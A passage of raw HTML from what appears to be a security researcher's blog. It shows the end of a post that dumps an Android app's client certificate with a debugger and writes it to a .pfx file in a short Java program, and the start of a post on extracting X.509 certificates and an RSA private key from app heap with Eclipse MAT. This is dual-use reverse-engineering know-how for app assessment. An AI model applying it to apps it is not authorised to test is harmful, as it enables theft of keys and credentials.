vertical-align: baseline; white-space: pre-wrap;">.</span></div>
</li>
</ol>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The following screenshot shows the rundown leading up to the client certificate and the password.</span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhElMlGHq4dQt737X2Bm9J67-XQn1g16L25llQ6Ta0E41geLG1rYRj6VnPszVnIgUm4ygmOSNi4hyphenhyphenHu1yyV5D-5NIy32ve7m0yFytYC-VLXscb_sVORNBI9dw8IyjVvq0sJyjYmuQCHAf06/s1600/jdb-and-content-hidden-client-info.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="215" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhElMlGHq4dQt737X2Bm9J67-XQn1g16L25llQ6Ta0E41geLG1rYRj6VnPszVnIgUm4ygmOSNi4hyphenhyphenHu1yyV5D-5NIy32ve7m0yFytYC-VLXscb_sVORNBI9dw8IyjVvq0sJyjYmuQCHAf06/s400/jdb-and-content-hidden-client-info.png" width="400" /></a></div>
<b style="font-weight: normal;"><br /><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></b>
<br />
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">After obtaining the </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">byte[]</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> dump of the client certificate, I created the </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">pfx</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> file with following Java code and then imported it to my browser store and also inside the web proxy. </span></div>
<div dir="ltr">
<table style="border-collapse: collapse; border: none;"><colgroup><col width="638"></col></colgroup><tbody>
<tr style="height: 0px;"><td style="background-color: #d9d9d9; border: 1px solid #000000; padding: 0px 7px 0px 7px; vertical-align: top;"><div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 12pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">import java.io.FileOutputStream;</span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">import java.io.IOException;</span></div>
<br />
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">public class PfxCreatorFromByteArray {</span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span>public static void main(String... args) throws IOException {</span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span><span class="Apple-tab-span" style="white-space: pre;"> </span>// Contains the byte[]for client certificate </span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span><span class="Apple-tab-span" style="white-space: pre;"> </span>byte[] pfx = {48, -126, </span><span style="background-color: transparent; color: red; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><more byte's here></span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">}; </span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span><span class="Apple-tab-span" style="white-space: pre;"> </span>FileOutputStream fos = new FileOutputStream("client-cert.pfx");</span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span><span class="Apple-tab-span" style="white-space: pre;"> </span>fos.write(pfx);</span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span><span class="Apple-tab-span" style="white-space: pre;"> </span>fos.close();</span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span>}</span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">}</span></div>
<br />
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></td></tr>
</tbody></table>
</div>
<b style="font-weight: normal;"><br /><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></b>
<br />
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The following image shows successful client certificate import.</span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg8kQHR0CwOGp5gZcxZ6yMPxD-WeU4TTQxc6krPEwf-sFapuCfknCBqTQZWcJNRsGIOgU09thLYSnBExTMNNQ1SmRSMfMERQuHYbSASQVA1q-mD5Zqr68yDc2LzZ_ZYOpPn-1VrxtsJxaxu/s1600/trusted-root-certificate-private-key.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="325" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg8kQHR0CwOGp5gZcxZ6yMPxD-WeU4TTQxc6krPEwf-sFapuCfknCBqTQZWcJNRsGIOgU09thLYSnBExTMNNQ1SmRSMfMERQuHYbSASQVA1q-mD5Zqr68yDc2LzZ_ZYOpPn-1VrxtsJxaxu/s400/trusted-root-certificate-private-key.png" width="400" /></a></div>
<br />
<span style="font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"></span><span style="font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">The imported client certificate then allowed me to successfully engage and assess the server portion of the application. In addition to the client certificate, combining the static and dynamic analysis techniques also allowed me to retrieve other sensitive information like Initialization Vectors, Encryption Keys etc… from the application. </span></div>
Gursev Singh Kalrahttp://www.blogger.com/profile/11125392470187170013noreply@blogger.com7tag:blogger.com,1999:blog-4663432300421783651.post-11678477424398278562013-10-22T03:00:00.000-07:002013-10-27T22:19:42.896-07:00Extracting RSAPrivateCrtKey and Certificates from an Android Process<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt; text-align: justify;">
<span style="font-family: Calibri; font-size: 15px; line-height: 1.1500000000000001; text-align: left; white-space: pre-wrap;">An Android application that I assessed recently had extensive cryptographic controls to protect client-server communication and to secure its local storage. To top that, its source code was completely obfuscated. </span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Combined, these two factors made the application a great candidate for reversing. In this blog I will detail the portion of work where I dumped </span><a href="http://en.wikipedia.org/wiki/X.509" style="text-decoration: none;"><span style="background-color: transparent; color: blue; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">X.509</span></a><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> certificates and constructed a RSA private key (</span><a href="http://docs.oracle.com/javase/7/docs/api/java/security/interfaces/RSAPrivateCrtKey.html" style="text-decoration: none;"><span style="background-color: transparent; color: blue; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">RSAPrivateCrtKey</span></a><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">) from the Android application memory using Eclipse Memory Analyzer Tool (</span><a href="http://www.eclipse.org/mat/" style="text-decoration: none;"><span style="background-color: transparent; color: blue; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">MAT</span></a><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">) and Java code.</span></div>
<h3 style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-size: large;">Analyzing Android Memory with Eclipse MAT</span></span></h3>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Eclipse MAT is primarily a Java heap analyzer that has extensive usage beyond its primary purpose of identifying memory leaks. It can be used to identify and dump sensitive information in Android application memory, perform some memory forensics etc… If you are new to Android memory analysis, I recommend that you get intimate with this tool for its obvious benefits. The following articles can help you get started.</span></div>
<ol style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 0pt; margin-top: 0pt;">
<a href="http://help.eclipse.org/kepler/index.jsp?topic=/org.eclipse.mat.ui.help/welcome.html" style="text-decoration: none;"><span style="background-color: transparent; color: blue; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">help.eclipse.org</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></a></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 0pt; margin-top: 0pt;">
<a href="http://android-developers.blogspot.com/2011/03/memory-analysis-for-android.html" style="text-decoration: none;"><span style="background-color: transparent; color: blue; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">android-developers.blogspot.com</span></a><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> </span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<a href="http://eclipsesource.com/blogs/2013/01/21/10-tips-for-using-the-eclipse-memory-analyzer/" style="text-decoration: none;"><span style="background-color: transparent; color: blue; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">eclipsesource.com</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></a></div>
</li>
</ol>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Okay, now back to our target application. </span></div>
<h3 style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-size: large;">Locating the crypto material</span></span></h3>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">As part of reversing process I used </span><a href="https://code.google.com/p/dex2jar/" style="text-decoration: none;"><span style="background-color: transparent; color: blue; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">dex2jar</span></a><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> to decompile the application </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">apk</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> to java files and started analyzing them. While following application logic and reviewing its obfuscated code, I stumbled upon a java file (</span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">com.pack.age.name.h.b.java</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">) that contained instance variables of type </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">SSLSocketFactory</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> and </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">X509TrustManager</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">. Clearly, this class was performing important cryptographic operations with respect to client-server communication. </span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">So I pivoted to this class to identify the source of its crypto material and all attempts led me from one rabbit hole to another. I then decided to directly look at application heap with Eclipse MAT. I launched the application and performed some operations to ensure that the application loads the required crypto material and then performed the following steps to create the HPROF file contain application heap dump.</span></div>
<ol style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Select the application from the list of running apps</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Select the “Show heap updates” option for the target application</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Select “Dump HPROF file” for analysis. </span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Since I had MAT plugin installed, ADT converted the Android memory dump to HPROF format and presented it for analysis. In case you do not have MAT plugin, you will need to convert the generated dump to MAT readable format with </span><a href="http://developer.android.com/tools/help/hprof-conv.html" style="text-decoration: none;"><span style="background-color: transparent; color: blue; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">hprof-conv</span></a><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> utility that comes with ADT.</span></div>
</li>
</ol>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">After opening the heap dump, I clicked on the “Dominator Tree” to view the object graph. Supplying the name of the class which had </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">SSLSocketFactory</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> and </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">X509TrustManager</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> instance variables in the Regex area filtered out most of the unwanted stuff. I then navigated the object tree to identify the </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">X.509</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> certificates and the </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">RSAPrivateCrtKey</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> is shown below.</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxhzLhmVAQ-6TY5VJ0h7POMJsqjzjavbpQfVXQvHOIH1xwbudZRHGKOQ-BuXE2UsjTBtb0ihoXC3Rp4xDqLU_LltdybY5jeZJQ4wkqedqCoQK434ZdwSqweH4u2QYi1xuRPbJx71cR-t8k/s1600/keys-certs-memory.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="220" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxhzLhmVAQ-6TY5VJ0h7POMJsqjzjavbpQfVXQvHOIH1xwbudZRHGKOQ-BuXE2UsjTBtb0ihoXC3Rp4xDqLU_LltdybY5jeZJQ4wkqedqCoQK434ZdwSqweH4u2QYi1xuRPbJx71cR-t8k/s400/keys-certs-memory.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="color: #4f81bd; font-family: Calibri; font-size: 12px; font-weight: bold; line-height: 12px; text-align: left; white-space: pre-wrap;"> Image shows two X.509 certificates and a RSAPrivateCrtKey in program heap</span></td></tr>
</tbody></table>
<div dir="ltr" style="line-height: 1; margin-bottom: 10pt; margin-top: 0pt;">
<br /></div>
<h3 style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-size: large;">Dumping the certificates</span></span></h3>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The X.509 certificates were byte arrays of different lengths and extracting the certificates turned out to be quick. I right clicked on the byte array navigated to Copy Save Value to File selected location to save the file and clicked Finish. MAT indicates that the copy functionality allows you to write </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">char[]</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">, </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">String</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">, </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">StringBuffer</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> and </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">StringBuilder</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> to a text file but it handsomely handled the </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">byte[]</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> in the current context. Please note the extension of the exported file was set to </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">.der </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">on the windows system. The following screenshots will show you the steps followed and one extracted certificate. </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi5sTKd2n7bgnNcD83bmJBr4KdoV-yRp0X9P160OHljUFJx5uCBdeXUXCvdyrTgTwqYs46zXBsIG81NF0pFr1XkFbwG4wCiWXVAcsodpCuHpKBi06C08eBmo0CdO9TjoN64PT9CSazOLG8g/s1600/exporting-a-certificate.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="156" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi5sTKd2n7bgnNcD83bmJBr4KdoV-yRp0X9P160OHljUFJx5uCBdeXUXCvdyrTgTwqYs46zXBsIG81NF0pFr1XkFbwG4wCiWXVAcsodpCuHpKBi06C08eBmo0CdO9TjoN64PT9CSazOLG8g/s320/exporting-a-certificate.png" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="color: #4f81bd; font-family: Calibri; font-size: 12px; font-weight: bold; line-height: 12px; text-align: left; white-space: pre-wrap;">Image shows selecting the “Save Value to File” functionality for the byte[]</span></td></tr>
</tbody></table>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
